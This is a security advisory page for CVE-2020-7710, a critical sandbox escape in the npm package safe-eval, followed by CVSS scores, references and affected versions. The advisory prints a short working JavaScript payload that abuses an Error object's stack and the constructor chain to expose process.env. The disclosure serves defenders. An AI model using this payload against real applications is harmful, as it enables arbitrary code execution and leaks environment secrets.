Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWhycHEtcjM5OS13aGd3
Sandbox Breakout / Arbitrary Code Execution in safe-eval
All versions of safe-eval are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to restrict access to the main context through Error objects. This may allow attackers to execute arbitrary code in the system.
Evaluating the payload
(function (){
var ex = new Error
ex.__proto__ = null
ex.stack = {
match: x => {
return x.constructor.constructor("throw process.env")()
}
}
return ex
})()
prints the contents of process.env.
Recommendation
No fix is currently available. Consider using an alternative package until a fix is made available.
Permalink: https://github.com/advisories/GHSA-hrpq-r399-whgwJSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLWhycHEtcjM5OS13aGd3
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Critical
Classification: General
Published: over 4 years ago
Updated: over 1 year ago
CVSS Score: 9.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Percentage: 0.01108
EPSS Percentile: 0.84245
Identifiers: GHSA-hrpq-r399-whgw, CVE-2020-7710
References:
- https://nvd.nist.gov/vuln/detail/CVE-2020-7710
- https://github.com/hacksparrow/safe-eval/issues/19
- https://snyk.io/vuln/SNYK-JS-SAFEEVAL-608076
- https://www.npmjs.com/advisories/1322
- https://github.com/advisories/GHSA-hrpq-r399-whgw
Blast Radius: 33.7
Affected Packages
npm:safe-eval
Dependent packages: 264Dependent repositories: 2,730
Downloads: 90,859 last month
Affected Version Ranges: <= 0.4.1
No known fixed version
All affected versions: 0.0.0, 0.1.0, 0.2.0, 0.3.0, 0.4.0, 0.4.1